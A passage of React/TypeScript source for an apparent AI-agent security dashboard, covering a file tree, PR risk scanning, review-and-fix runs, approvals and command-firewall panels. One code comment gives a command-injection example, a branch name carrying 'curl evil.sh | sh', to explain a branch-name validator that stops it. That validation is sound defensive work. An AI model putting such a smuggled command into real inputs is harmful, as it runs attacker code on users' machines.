                    key={`${result.path}:${result.line || 0}`}
                    className="palette-row"
                    onClick={() => void openSearchResult(result)}
                  >
                    {searchMode === "text" ? (
                      <>
                        <div className="palette-row__head">
                          {result.path}:{result.line}
                        </div>
                        <pre className="palette-row__preview">{result.lineText || ""}</pre>
                      </>
                    ) : (
                      <>
                        <strong>{result.path.split("/").pop()}</strong>
                        <span className="palette-row__dir">
                          {result.path.includes("/")
                            ? result.path.slice(0, result.path.lastIndexOf("/"))
                            : ""}
                        </span>
                      </>
                    )}
                  </li>
                ))}
            </ul>
            <div className="palette-hint">
              Enter open - Esc close -{" "}
              {searchPayload ? `${searchPayload.results.length} result(s)` : "ready"}
            </div>
          </div>
        </div>
      )}
      <SettingsModal open={settingsOpen} onClose={() => setSettingsOpen(false)} />
    </div>
  );
}

function FileTree({
  entries,
  expanded,
  treeEntries,
  onToggle,
  onOpen,
  depth = 0,
}: {
  entries: FileEntry[];
  expanded: Set<string>;
  treeEntries: Map<string, FileEntry[]>;
  onToggle: (path: string) => Promise<void>;
  onOpen: (entry: FileEntry) => Promise<void>;
  depth?: number;
}) {
  return (
    <ul className="files-tree__list">
      {entries.map((entry) => (
        <li key={entry.path} className="files-tree__item">
          <div
            className={`files-tree__row ${entry.restricted ? "is-restricted" : ""}`}
            style={{ paddingLeft: 4 + depth * 12 }}
            onClick={() =>
              entry.type === "directory" ? void onToggle(entry.path) : void onOpen(entry)
            }
          >
            <span className="files-tree__icon" aria-hidden="true">
              {entry.type === "directory" ? (
                expanded.has(entry.path) ? (
                  "v"
                ) : (
                  ">"
                )
              ) : entry.restricted ? (
                <Lock size={12} color="#facc15" />
              ) : (
                <FileTypeIcon path={entry.path} size={12} />
              )}
            </span>
            <span className="files-tree__label" title={entry.restrictedReason || entry.path}>
              {entry.name}
            </span>
          </div>
          {entry.type === "directory" &&
            expanded.has(entry.path) &&
            treeEntries.has(entry.path) && (
              <FileTree
                entries={treeEntries.get(entry.path) || []}
                expanded={expanded}
                treeEntries={treeEntries}
                onToggle={onToggle}
                onOpen={onOpen}
                depth={depth + 1}
              />
            )}
        </li>
      ))}
    </ul>
  );
}

function InspectorButton({
  tab,
  active,
  badge,
  onSelect,
  children,
}: {
  tab: InspectorTab;
  active: boolean;
  badge?: number;
  onSelect: (tab: InspectorTab) => void;
  children: ReactNode;
}) {
  return (
    <button
      className="context-tab"
      role="tab"
      data-tab={tab}
      data-badge={badge || undefined}
      aria-selected={active}
      type="button"
      onClick={() => onSelect(tab)}
    >
      {children} {badge ? <span className="context-tab__badge">{badge}</span> : null}
    </button>
  );
}

function ContextCard({
  title,
  action,
  children,
}: {
  title: string;
  action?: ReactNode;
  children: ReactNode;
}) {
  return (
    <section className="context-card">
      <div className="section-heading">
        <span>{title}</span>
        {action}
      </div>
      <div className="playbook-panel">{children}</div>
    </section>
  );
}

function PrRiskCard({
  items,
  rootPath,
  analyzePr,
  onOpenTerminal,
  canViewHistory,
}: {
  items: Array<Record<string, unknown>>;
  rootPath: string | null;
  analyzePr: (args: { prUrl: string; changedFiles: string[]; diff: string }) => Promise<unknown>;
  onOpenTerminal: () => void;
  // Only Security-entitled users can read run history; gating the render keeps
  // the listRemediationRuns() fetch (a requireSecurity route) from firing a
  // spurious 402 for Base users (Codex P2). Reactive — a lapse unmounts it.
  canViewHistory: boolean;
}) {
  const [runId, setRunId] = useState<string | null>(null);
  const [running, setRunning] = useState(false);
  // Bumped when a run settles so the history list re-fetches and shows it.
  const [historyKey, setHistoryKey] = useState(0);
  const [starting, setStarting] = useState(false);
  const [startError, setStartError] = useState<string | null>(null);
  const [copiedNote, setCopiedNote] = useState(false);
  const [testCommand, setTestCommand] = useState("npm test");
  const [scanning, setScanning] = useState(false);
  const [scanError, setScanError] = useState<string | null>(null);
  const [scanTruncated, setScanTruncated] = useState(false);
  const [excludedRestricted, setExcludedRestricted] = useState(0);
  // Only show the brief for the branch the user actually scanned in this card
  // instance (keyed by session) — never another branch's score. Empty until a
  // scan returns a prUrl.
  const [lastScanPrUrl, setLastScanPrUrl] = useState<string | null>(null);

  // ── PR picker (Stage A of the productized enhance-review) ──────────────────
  // List the connected GitHub installation's open PRs so the user chooses WHICH
  // PR to score / fix, rather than only the implicit local branch. selectedPr
  // is "" (the local working branch — legacy path) or `${repo}#${number}`.
  const listOpenPulls = useAction(convexApi.github.listPulls.listOpenPulls);
  const pullDiff = useAction(convexApi.github.listPulls.pullDiff);
  const reviewScore = useAction(convexApi.review.checkRuns.reviewScore);
  const [pulls, setPulls] = useState<
    Array<{ number: number; title: string; repo: string; headRef: string; htmlUrl: string }>
  >([]);
  const [ghConnected, setGhConnected] = useState<boolean | null>(null);
  const [selectedPr, setSelectedPr] = useState<string>("");

  // ── Instant deterministic rubric + backend review run (Stages B–D) ─────────
  // Selecting a PR fetches the 6-dimension baseline rubric (reviewScore — no DB
  // writes, recomputable per selection); "Fix to 100" then starts the headless
  // backend enhance-review run and the panel below polls its live status.
  const [rubric, setRubric] = useState<ReviewRubric | null>(null);
  const [rubricLoading, setRubricLoading] = useState(false);
  const [rubricError, setRubricError] = useState<string | null>(null);
  const [prMeta, setPrMeta] = useState<{ prUrl: string; headRef: string } | null>(null);
  const [reviewRunId, setReviewRunId] = useState<string | null>(null);

  // The run executes host-side and outlives this component: persist the PR
  // selection per workspace (written on user change, below) and re-attach to
  // the in-flight (or just-finished) run after a reload, instead of orphaning
  // the view.
  const selectionKey = rootPath ? `steerly.review.selectedPr:${rootPath}` : null;
  useEffect(() => {
    if (!selectionKey || selectedPr || pulls.length === 0) return;
    try {
      const stored = localStorage.getItem(selectionKey);
      if (stored && pulls.some((p) => `${p.repo}#${p.number}` === stored)) setSelectedPr(stored);
    } catch {
      /* storage unavailable — selection just doesn't persist */
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [pulls, selectionKey]);
  useEffect(() => {
    if (!selectedPr || reviewRunId) return;
    let cancelled = false;
    const sep = selectedPr.lastIndexOf("#");
    const repo = selectedPr.slice(0, sep);
    const prNumber = Number(selectedPr.slice(sep + 1));
    (async () => {
      try {
        const r = await api.getActiveReviewRun({ repo, prNumber });
        if (cancelled || !r.runId) return;
        setReviewRunId(r.runId);
        if (r.state === "running") setRunning(true);
      } catch {
        /* best-effort lookup — a failure just means no re-attach */
      }
    })();
    return () => {
      cancelled = true;
    };
    // reviewRunId in deps: when the PR-switch effect below clears the binding,
    // this re-fires and looks up the NEW PR's active run.
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [selectedPr, reviewRunId]);

  // Bumped by "Scan PR" so the rubric re-fetches for the same selection (the
  // PR head may have moved — e.g. after a review run pushed fixes).
  const [rubricKey, setRubricKey] = useState(0);

  // Post-restart fallback: when no live host run is bound, subscribe to the
  // PERSISTED record for this PR so the last outcome survives app restarts
  // (and updates reactively when a host upsert lands).
  const selParsed = useMemo(() => {
    if (!selectedPr) return null;
    const sep = selectedPr.lastIndexOf("#");
    return { repo: selectedPr.slice(0, sep), prNumber: Number(selectedPr.slice(sep + 1)) };
  }, [selectedPr]);
  const latestRunRecord = useQuery(
    convexApi.review.queries.latestForPr,
    selParsed && !reviewRunId ? selParsed : "skip"
  );

  // Steer to Safety — review & fix EVERY open PR, one agent at a time.
  const [batchId, setBatchId] = useState<string | null>(null);
  const [batchRunning, setBatchRunning] = useState(false);
  async function onSteerToSafety() {
    if (!rootPath || batchRunning) return;
    setStartError(null);
    try {
      const { batchId: id } = await api.startReviewAll({ rootPath });
      setBatchId(id);
      setBatchRunning(true);
    } catch (err) {
      const code = err instanceof ApiError ? err.status : undefined;
      setStartError(
        code === 402
          ? "Upgrade to Pro to run reviews."
          : (err as Error)?.message || "Failed to start the batch."
      );
    }
  }
  useEffect(() => {
    // A different PR (or a re-scan) must never show the previous run's panel
    // or rubric — unbind and re-score; the re-attach effect above rebinds to
    // the new PR's run if one is live.
    setReviewRunId(null);
    setRunning(false);
    if (!selectedPr) {
      setRubric(null);
      setRubricError(null);
      setPrMeta(null);
      return;
    }
    let cancelled = false;
    setRubricLoading(true);
    setRubricError(null);
    setRubric(null);
    (async () => {
      try {
        const sep = selectedPr.lastIndexOf("#");
        const repo = selectedPr.slice(0, sep);
        const prNumber = Number(selectedPr.slice(sep + 1));
        const r = (await reviewScore({ repo, prNumber })) as
          | { ok: true; rubric: ReviewRubric; prUrl: string; headRef: string }
          | { ok: false; reason: string };
        if (cancelled) return;
        if (!r.ok) {
          setRubricError(
            r.reason === "github not connected"
              ? "Connect GitHub to score a PR."
              : "Couldn't score this PR — try again."
          );
          return;
        }
        setRubric(r.rubric);
        setPrMeta({ prUrl: r.prUrl, headRef: r.headRef });
      } catch {
        if (!cancelled) setRubricError("Couldn't score this PR — try again.");
      } finally {
        if (!cancelled) setRubricLoading(false);
      }
    })();
    return () => {
      cancelled = true;
    };
    // reviewScore is a stable convex action ref — depend on the selection +
    // the Scan-PR refetch key only.
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [selectedPr, rubricKey]);
  useEffect(() => {
    let cancelled = false;
    (async () => {
      try {
        const r = (await listOpenPulls({})) as {
          connected: boolean;
          pulls: Array<{
            number: number;
            title: string;
            repo: string;
            headRef: string;
            htmlUrl: string;
          }>;
        };
        if (cancelled) return;
        setGhConnected(r.connected);
        setPulls(r.pulls || []);
      } catch {
        // 402 (no pro/entitlement) or a transient error → treat as not-connected
        // so the pane shows the connect guidance rather than a dead control.
        if (!cancelled) setGhConnected(false);
      }
    })();
    return () => {
      cancelled = true;
    };
    // listOpenPulls is a stable convex action ref — depend only on rootPath so
    // this runs on mount + workspace change, never per-render.
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [rootPath]);

  // Reset run state when the active workspace root changes — this card is keyed
  // by session, not rootPath, so switching projects mid-session would otherwise
  // keep a stale run/report for the wrong workspace (Codex #142).
  const prevRootRef = useRef<string | null>(null);
  useEffect(() => {
    const prev = prevRootRef.current;
    prevRootRef.current = rootPath;
    setRunId(null);
    setRunning(false);
    setStartError(null);
    setCopiedNote(false);
    setReviewRunId(null);
    setBatchId(null);
    setBatchRunning(false);
    // Clear the PR selection only on a real project SWITCH — the initial
    // null→path hydration must not wipe a selection the user already made
    // while the projects fetch was in flight.
    if (prev != null) setSelectedPr("");
  }, [rootPath]);

  async function onFixTo100() {
    if (!rootPath || starting || running) return;
    if (selectedPr) {
      // Backend enhance-review on the SELECTED GitHub PR: the host checks the
      // PR head out into an isolated worktree and the user's own agent reviews,
      // fixes, pushes (gated) and posts the review comment. No test command —
      // the rubric (re-scored objectively) is the verification.
      const sep = selectedPr.lastIndexOf("#");
      const repo = selectedPr.slice(0, sep);
      const prNumber = Number(selectedPr.slice(sep + 1));
      setStarting(true);
      setStartError(null);
      setReviewRunId(null);
      try {
        const { runId: id } = await api.startReviewRun({
          rootPath,
          repo,
          prNumber,
          headRef: prMeta?.headRef,
          prUrl: prMeta?.prUrl,
          baseline: rubric,
        });
        setReviewRunId(id);
        setRunning(true);
      } catch (err) {
        const code = err instanceof ApiError ? err.status : undefined;
        setStartError(
          code === 409
            ? "A review run is already active for this pull request."
            : code === 402
              ? "Upgrade to Pro to run reviews."
              : (err as Error)?.message || "Failed to start the review run."
        );
      } finally {
        setStarting(false);
      }
      return;
    }
    const cmd = testCommand.trim();
    if (!cmd) {
      setStartError("A test command is required so the run can verify each fix.");
      return;
    }
    setStarting(true);
    setStartError(null);
    setRunId(null);
    try {
      // Pass the verify command — without it every round fails-closed (Codex #142).
      const { runId: id } = await api.startRemediationRun({ rootPath, testCommand: cmd });
      setRunId(id);
      setRunning(true);
    } catch (err) {
      const code = err instanceof ApiError ? err.status : undefined;
      setStartError(
        code === 409
          ? "A remediation run is already active for this workspace."
          : (err as Error)?.message || "Failed to start the run."
      );
    } finally {
      setStarting(false);
    }
  }

  // A run record's `branch` is caller-supplied (remediationRuns.branch is a bare
  // v.string()), and this builds a shell command from it and puts it on the
  // clipboard next to an open terminal. A forged run with
  // `branch: "main; curl evil.sh | sh"` would hand a teammate an
  // attacker-authored command to paste. Git ref names cannot contain any of
  // this, so anything outside the ref grammar means the value is not a branch.
  const SAFE_BRANCH = /^[A-Za-z0-9._\/-]{1,255}$/;
  const [branchRejected, setBranchRejected] = useState<string | null>(null);

  async function onOpenBranch(branch: string) {
    if (!SAFE_BRANCH.test(branch) || branch.includes("..")) {
      // Rejecting silently left the button rendered and doing nothing — this
      // PR's own "fails closed but invisibly" pathology, inside the fix for a
      // security bug. Say why.
      setCopiedNote(false);
      setBranchRejected(branch);
      return;
    }
    setBranchRejected(null);
    onOpenTerminal();
    const cmd = `git checkout ${branch}`;
    // Only claim "copied" when the clipboard write actually succeeds; otherwise
    // the branch + command stay visible in the panel for manual copy (Gemini #142).
    try {
      if (navigator.clipboard?.writeText) {
        await navigator.clipboard.writeText(cmd);
        setCopiedNote(true);
        setTimeout(() => setCopiedNote(false), 4000);
      }
    } catch {
      setCopiedNote(false);
    }
  }

  async function onScan() {
    if (scanning) return;
    setScanning(true);
    setScanError(null);
    setScanTruncated(false);
    setExcludedRestricted(0);
    try {
      if (selectedPr) {
        // Score the SELECTED GitHub PR: fetch its diff server-side, then run
        // the existing analyzePr flow on it. Also re-fetch the rubric — the
        // PR head may have moved since the last score (e.g. a review run
        // pushed fixes), and a stale card would misread as "stuck".
        setRubricKey((k) => k + 1);
        const sep = selectedPr.lastIndexOf("#");
        const repo = selectedPr.slice(0, sep);
        const prNumber = Number(selectedPr.slice(sep + 1));
        const d = await pullDiff({ repo, prNumber });
        if (!d.ok) {
          setScanError(
            d.reason === "github not connected"
              ? "Connect GitHub to scan a PR."
              : "Couldn't load the PR diff — try again."
          );
          return;
        }
        setScanTruncated(d.truncated);
        setLastScanPrUrl(d.prUrl);
        await analyzePr({ prUrl: d.prUrl, changedFiles: d.changedFiles, diff: d.diff });
        return;
      }
      // Legacy path: score the local working branch's diff.
      if (!rootPath) {
        setScanError("Open a project folder or choose a pull request to scan.");
        return;
      }
      const r = await api.scanLocalRisk({ rootPath });
      if (!r.ok) {
        setScanError(scanReasonMessage(r.reason));
        setExcludedRestricted(r.excludedRestricted ?? 0);
        return;
      }
      // Surface a truncation note so the score is never silently partial.
      setScanTruncated(r.truncated);
      setExcludedRestricted(r.excludedRestricted);
      setLastScanPrUrl(r.prUrl);
      await analyzePr({ prUrl: r.prUrl, changedFiles: r.changedFiles, diff: r.diff });
      // recentBriefs re-fires reactively → `items` updates on the next render.
    } catch (err) {
      setScanError(
        err instanceof ApiError && err.status === 402
          ? "Upgrade to Security to scan PR risk."
          : "Scan failed — check the host is running and try again."
      );
    } finally {
      setScanning(false);
    }
  }

  return (
    <ContextCard
      title="PR risk"
      action={
        <div className="pr-risk-actions">
          <button
            className="button secondary"
            type="button"
            onClick={onScan}
            disabled={scanning || (!rootPath && !selectedPr)}
          >
            {scanning ? "Scanning…" : selectedPr ? "Scan PR" : "Scan branch"}
          </button>
          {!selectedPr && (
            <input
              className="input pr-risk-test-command"
              type="text"
              value={testCommand}
              onChange={(e) => setTestCommand(e.target.value)}
              onKeyDown={(e) => {
                if (e.key === "Enter" && rootPath && !starting && !running) {
                  e.preventDefault();
                  void onFixTo100();
                }
              }}
              disabled={running}
              aria-label="Test command"
              placeholder="npm test"
              data-testid="fix-to-100-test-command"
            />
          )}
          <button
            className="button secondary"
            type="button"
            onClick={onFixTo100}
            disabled={!rootPath || starting || running}
            title={
              selectedPr
                ? "Your agent reviews & fixes the selected PR to 5/5 — pushes (with your approval) and posts the review comment."
                : undefined
            }
          >
            {starting
              ? "Starting…"
              : running
                ? "Running…"
                : selectedPr
                  ? "Review & Fix"
                  : "Fix to 100"}
          </button>
        </div>
      }
    >
      {ghConnected === false ? (
        <div className="pr-picker pr-picker--disconnected" data-testid="pr-picker-disconnected">
          <p>
            Connect your GitHub App to review pull requests here. Once connected, your open PRs
            appear in a picker and you can score &amp; fix them.
          </p>
          <button
            type="button"
            className="button secondary"
            onClick={() => navigateRoute("/security-center?tab=manage#github-integration")}
          >
            Connect GitHub
          </button>
        </div>
      ) : ghConnected && pulls.length > 0 ? (
        <label className="pr-picker">
          <span className="pr-picker__label">Pull request</span>
          <select
            className="input pr-picker__select"
            value={selectedPr}
            onChange={(e) => {
              setSelectedPr(e.target.value);
              // Persist only on USER intent — the project-switch reset must
              // not clobber another workspace's stored selection.
              try {
                if (selectionKey) {
                  if (e.target.value) localStorage.setItem(selectionKey, e.target.value);
                  else localStorage.removeItem(selectionKey);
                }
              } catch {
                /* storage unavailable */
              }
            }}
            disabled={scanning || running}
            data-testid="pr-picker-select"
          >
            <option value="">Current local branch</option>
            {pulls.map((p) => (
              <option key={`${p.repo}#${p.number}`} value={`${p.repo}#${p.number}`}>
                #{p.number} {p.title} · {p.repo}
              </option>
            ))}
          </select>
        </label>
      ) : ghConnected && pulls.length === 0 ? (
        <p className="pr-picker__empty">No open pull requests on the connected repo.</p>
      ) : null}
      {ghConnected && pulls.length > 0 && (
        <SteerToSafetyButton
          count={pulls.length}
          running={batchRunning}
          disabled={!rootPath}
          onClick={() => void onSteerToSafety()}
        />
      )}
      {batchId && <ReviewBatchPanel batchId={batchId} onSettled={() => setBatchRunning(false)} />}
      {selectedPr && rubricLoading && (
        <p className="pr-risk-scan-note" data-testid="rubric-loading">
          Scoring this pull request…
        </p>
      )}
      {selectedPr && rubricError && (
        <p className="pr-risk-scan-error" data-testid="rubric-error">
          {rubricError}
        </p>
      )}
      {selectedPr && rubric && !reviewRunId && !latestRunRecord && <RubricCard rubric={rubric} />}
      {selectedPr ? (
        <p className="pr-risk-explainer">
          The rubric above is Steerly's instant deterministic score.{" "}
          <strong>Review &amp; Fix</strong> runs your own agent on the PR in an isolated worktree —
          it reviews, fixes, pushes (with your approval) and posts the review comment on GitHub.
        </p>
      ) : (
        <p className="pr-risk-explainer">
          <strong>Scan branch</strong> scores your current diff for PR risk.{" "}
          <strong>Fix to 100</strong> runs an automated review-and-fix loop in an isolated git
          worktree until your test command passes — your working tree must be a clean git repo with
          a base branch.
        </p>
      )}
      <MiniList
        items={(lastScanPrUrl
          ? items.filter((it) => it.title === lastScanPrUrl || it.name === lastScanPrUrl)
          : []
        ).slice(0, 6)}
        empty="No PR risk scan loaded."
      />
      {scanError && (
        <p className="pr-risk-scan-error" data-testid="pr-risk-scan-error">
          {scanError}
        </p>
      )}
      {scanTruncated && !scanError && (
        <p className="pr-risk-scan-note" data-testid="pr-risk-scan-note">
          Large diff truncated to 256 KB — the score reflects the first part only.
        </p>
      )}
      {excludedRestricted > 0 && !scanError && (
        <p className="pr-risk-scan-note" data-testid="pr-risk-excluded-note">
          {excludedRestricted} restricted file{excludedRestricted === 1 ? "" : "s"} (e.g. .env,
          keys) excluded from the scan.
        </p>
      )}
      {startError && (
        <p className="fix-to-100-error" data-testid="fix-to-100-error">
          {startError}
        </p>
      )}
      {reviewRunId ? (
        <ReviewRunPanel runId={reviewRunId} baseline={rubric} onSettled={() => setRunning(false)} />
      ) : selectedPr && latestRunRecord ? (
        <ReviewRunPanel
          record={{
            state: latestRunRecord.status,
            runId: latestRunRecord.runId,
            repo: latestRunRecord.repo,
            prNumber: latestRunRecord.prNumber,
            prUrl: latestRunRecord.prUrl,
            baseline: (latestRunRecord.rubricBaseline as ReviewRubric | null) ?? null,
            approvals: latestRunRecord.approvals ?? [],
            rubricFinal: (latestRunRecord.rubricFinal as ReviewRubric | null) ?? null,
            commentUrl: latestRunRecord.commentUrl,
            pushed: Boolean(latestRunRecord.pushed),
            error: latestRunRecord.error,
            unverified: Boolean((latestRunRecord as { unverified?: boolean }).unverified),
            createdBy: (latestRunRecord as { createdBy?: string }).createdBy,
          }}
        />
      ) : null}
      {runId && (
        <RemediationRunPanel
          runId={runId}
          onOpenBranch={onOpenBranch}
          onSettled={() => {
            setRunning(false);
            setHistoryKey((k) => k + 1);
          }}
        />
      )}
      {copiedNote && (
        <p className="fix-to-100-note" data-testid="fix-to-100-copied">
          Command copied — paste in the terminal to review.
        </p>
      )}
      {branchRejected !== null && (
        <p className="fix-to-100-note" data-testid="fix-to-100-branch-rejected">
          Not opening “{branchRejected}” — that is not a valid git branch name, so it was not put on
          your clipboard. A run record can carry any string here, and this builds a shell command
          from it.
        </p>
      )}
      {canViewHistory && <RemediationHistory refreshKey={historyKey} onOpenBranch={onOpenBranch} />}
    </ContextCard>
  );
}

function scanReasonMessage(reason: string): string {
  if (reason === "not a git repository") return "This workspace isn't a git repository.";
  if (reason === "no base branch found")
    return "Couldn't find a base branch (origin/main…) to compare against.";
  if (reason.startsWith("no changes vs "))
    return `No changes vs ${reason.slice("no changes vs ".length)} — nothing to score.`;
  if (reason === "only restricted files changed")
    return "Only restricted files (e.g. .env, keys) changed — excluded from the scan.";
  if (reason === "git not available") return "git isn't available on the host.";
  return "Couldn't scan this branch.";
}

function MiniList({ items, empty }: { items: Array<Record<string, unknown>>; empty: string }) {
  if (!items.length) return <p>{empty}</p>;
  return (
    <div className="mini-list">
      {items.map((item, index) => (
        <div key={String(item.id || item.name || item.path || index)} className="file-row">
          <div>
            <strong>{String(item.title || item.name || item.path || item.id || "Item")}</strong>
            <span>
              {String(item.reason || item.description || item.status || item.summary || "")}
            </span>
          </div>
        </div>
      ))}
    </div>
  );
}

function AgentPlaybookPanel({ session }: { session: AgentSession | null }) {
  if (!session) return <p>Select an agent session.</p>;
  const raw = session.agentPlaybook as Record<string, unknown> | undefined;
  const name = raw?.name ?? session.agent;
  const headline = raw?.headline;
  const sourceLabel = raw?.sourceLabel;
  const guardrails = (raw?.guardrailFocus as string[] | undefined) || [];
  return (
    <>
      <strong>{String(name)}</strong>
      {headline ? <p>{String(headline)}</p> : null}
      {guardrails.length > 0 && (
        <div className="mini-list">
          {guardrails.map((item) => (
            <span key={item}>{item}</span>
          ))}
        </div>
      )}
      {sourceLabel ? <small>{String(sourceLabel)}</small> : null}
    </>
  );
}

function TaskContractPanel({ session }: { session: AgentSession | null }) {
  if (!session) return <p>No active task contract.</p>;
  const contract = session.taskContract as Record<string, unknown> | undefined;
  const objective = contract?.objective || session.goal || session.title;
  const allowed = (contract?.allowedWork as string[] | undefined) || [];
  const blocked = (contract?.blockedWork as string[] | undefined) || [];
  const acceptance = (contract?.acceptanceCriteria as string[] | undefined) || [];
  const evidence = (contract?.requiredEvidence as string[] | undefined) || [];
  return (
    <>
      {objective ? <p>{String(objective)}</p> : null}
      <div className="contract-grid">
        <div>
          <strong>Allowed</strong>
          {allowed.map((item) => (
            <span key={item}>{item}</span>
          ))}
        </div>
        <div>
          <strong>Blocked</strong>
          {blocked.map((item) => (
            <span key={item}>{item}</span>
          ))}
        </div>
      </div>
      <ListBlock label="Acceptance" items={acceptance} />
      <ListBlock label="Evidence" items={evidence} />
    </>
  );
}

function ContextPackPanel({ session }: { session: AgentSession | null }) {
  if (!session) return <p>No repository selected.</p>;
  const pack = session.contextPack as Record<string, unknown> | undefined;
  const summary = pack?.summary;
  const files = (pack?.recommendedFiles as string[] | undefined) || [];
  const search = (pack?.searchPrompts as string[] | undefined) || [];
  const advice = pack?.agentModeAdvice;
  return (
    <>
      {summary ? <p>{String(summary)}</p> : <p>Repository: {session.repository}</p>}
      <ListBlock label="Files" items={files} />
      <ListBlock label="Search" items={search} />
      {advice ? (
        <>
          <strong>Mode advice</strong>
          <span>{String(advice)}</span>
        </>
      ) : null}
    </>
  );
}

function CodeContextPanel({ files }: { files?: Array<Record<string, unknown>> }) {
  const list = (files || []).slice(0, 8);
  if (!list.length) return <p>No context files loaded.</p>;
  return (
    <div className="mini-list">
      {list.map((file, index) => (
        <span key={String(file.path || file.id || index)}>
          <strong>{String(file.name || file.path || "file")}</strong>
          {file.summary ? <> — {String(file.summary)}</> : null}
        </span>
      ))}
    </div>
  );
}

function MemoryNotesPanel({ notes }: { notes?: Array<Record<string, unknown>> }) {
  const list = (notes || []).slice(0, 6);
  if (!list.length)
    return <p className="empty-state">No security memory linked to this session yet.</p>;
  return (
    <>
      {list.map((note, index) => (
        <article key={String(note.id || note.title || index)} className="memory-note">
          <strong>{String(note.title || "Memory")}</strong>
          <span>
            {String(note.type || "note")}
            {Array.isArray(note.tags) && note.tags.length
              ? ` · ${(note.tags as string[]).join(", ")}`
              : ""}
          </span>
          {note.summary ? <p>{String(note.summary)}</p> : null}
          {Array.isArray(note.backlinks) && (note.backlinks as string[]).length ? (
            <small>Backlinks: {(note.backlinks as string[]).join(", ")}</small>
          ) : null}
        </article>
      ))}
    </>
  );
}

// --- Chat-scoped Inspector section components --------------------------------

function ChatContextSections({ chat }: { chat: import("../types").Chat }) {
  void chat; // memory is a placeholder until chat-scoped memory lands
  return (
    <ContextCard title="Memory">
      <p className="empty-state">No memory notes linked to this chat yet.</p>
    </ContextCard>
  );
}

function ChatSecuritySections({
  chat,
  pending,
}: {
  chat: import("../types").Chat;
  pending: ApprovalRequest[];
}) {
  const toolCalls = (chat.messages || []).flatMap((m) => m.toolCalls || []);
  const approvals = chat.approvals || [];
  return (
    <>
      {pending.length > 0 && (
        <ContextCard title="Pending approvals">
          <div className="mini-list">
            {pending.map((p) => (
              <div key={p.id} className="tool-row">
                <header>
                  <strong>{p.rule}</strong>
                  <span className="status-chip status-needs-review">pending</span>
                </header>
                <p>{p.command}</p>
                <p className="empty-state">Respond in the chat thread →</p>
              </div>
            ))}
          </div>
        </ContextCard>
      )}
      <ContextCard title="Tool calls">
        {toolCalls.length === 0 ? (
          <p>No tool calls yet.</p>
        ) : (
          <div className="tool-list">
            {toolCalls.slice(0, 20).map((tc) => (
              <div key={tc.id} className="tool-row">
                <header>
                  <strong>{tc.name}</strong>
                  {tc.verdict ? (
                    <span className={`status-chip ${decisionClass(tc.verdict)}`}>{tc.verdict}</span>
                  ) : null}
                </header>
              </div>
            ))}
          </div>
        )}
      </ContextCard>
      <ContextCard title="Policy decisions">
        {approvals.length === 0 ? (
          <p>No policy decisions yet.</p>
        ) : (
          <div className="mini-list">
            {approvals.map((a, index) => (
              <div key={index} className="tool-row">
                <header>
                  <strong>{a.rule}</strong>
                  <span className="status-chip muted">{a.scope}</span>
                </header>
                <p>{new Date(a.ts).toLocaleTimeString()}</p>
              </div>
            ))}
          </div>
        )}
      </ContextCard>
    </>
  );
}

function ChatReviewSections({ chat }: { chat: import("../types").Chat }) {
  const filePaths = Array.from(
    new Set((chat.messages || []).flatMap((m) => (m.fileEdits || []).map((e) => e.path)))
  );
  return (
    <ContextCard title="Files touched">
      {filePaths.length === 0 ? (
        <p>No file edits recorded.</p>
      ) : (
        <div className="mini-list">
          {filePaths.map((path) => (
            <span key={path}>{path}</span>
          ))}
        </div>
      )}
    </ContextCard>
  );
}

function ReviewerHandoffPanel({ session }: { session: AgentSession | null }) {
  if (!session) return <p>No active session.</p>;
  const handoff = session.reviewerHandoff as Record<string, unknown> | undefined;
  const sections = (handoff?.sections as Array<Record<string, unknown>> | undefined) || [];
  if (!sections.length)
    return <p>Use the session transcript, tool timeline, and approvals as review evidence.</p>;
  return (
    <>
      {sections.map((section, index) => (
        <div key={String(section.label || index)} className="handoff-section">
          <strong>{String(section.label || "Section")}</strong>
          {((section.items as string[] | undefined) || []).map((item, itemIndex) => (
            <span key={itemIndex}>{item}</span>
          ))}
        </div>
      ))}
    </>
  );
}

function ListBlock({ label, items }: { label: string; items: string[] }) {
  if (!items.length) return null;
  return (
    <>
      <strong>{label}</strong>
      {items.map((item, index) => (
        <span key={index}>{item}</span>
      ))}
    </>
  );
}

function ApprovalList({
  approvals,
  onDecision,
}: {
  approvals: Array<Record<string, unknown>>;
  onDecision: (id: string, decision: string) => Promise<void>;
}) {
  if (!approvals.length) return <p>No pending approvals.</p>;
  return (
    <div className="mini-list">
      {approvals.map((approval) => (
        <article key={String(approval.id)} className="approval-card">
          <header>
            <span className={`risk-pill ${riskClass(approval.severity)}`}>
              {String(approval.severity || "medium")}
            </span>
            <span className="status-chip muted">{String(approval.status || "pending")}</span>
          </header>
          <strong>{String(approval.title || approval.command || approval.id)}</strong>
          <p>{String(approval.requestedAction || approval.reason || "")}</p>
          <div className="approval-actions">
            <button
              className="button secondary"
              type="button"
              onClick={() => void onDecision(String(approval.id), "denied")}
            >
              Deny
            </button>
            <button
              className="button primary"
              type="button"
              onClick={() => void onDecision(String(approval.id), "approved")}
            >
              Approve
            </button>
          </div>
        </article>
      ))}
    </div>
  );
}

function CommandResult({ result }: { result: Record<string, unknown> }) {
  return (
    <article className="command-result-card">
      <header>
        <span className={`risk-pill ${riskClass(result.severity)}`}>
          {String(result.severity || "info")}
        </span>
        <span className={`status-chip ${decisionClass(result.decision)}`}>
          {String(result.decision || "allow")}
        </span>
      </header>
      {result.command ? <code>{String(result.command)}</code> : null}
      <p>{String(result.reason || "No rule matched")}</p>
      {result.saferAlternative ? <span>{String(result.saferAlternative)}</span> : null}
    </article>
  );
}

function CommandSamples({ session }: { session: AgentSession | null }) {
  const samples = ((session?.commandFirewall as Record<string, unknown> | undefined)
    ?.sampleActions || []) as Array<Record<string, unknown>>;
  if (!samples.length) return null;
  return (
    <>
      {samples.map((sample) => (
        <article key={String(sample.command)} className="command-sample">
          <code>{String(sample.command || "")}</code>
          <span className={`status-chip ${decisionClass(sample.decision)}`}>
            {String(sample.decision || "allow")}
          </span>
        </article>
      ))}
    </>
  );
}

function CommandList({ events }: { events: CommandEvent[] }) {
  if (!events.length) return <p>No tool calls recorded.</p>;
  return (
    <div className="tool-list">
      {events.map((event, index) => (
        <div key={event.id || index} className="tool-row">
          <header>
            <strong>{String(event.type || event.name || "event")}</strong>
            <span
              className={`status-chip ${event.decision === "deny" ? "status-blocked" : event.decision === "ask" ? "status-needs-review" : "muted"}`}
            >
              {String(event.decision || event.status || "recorded")}
            </span>
          </header>
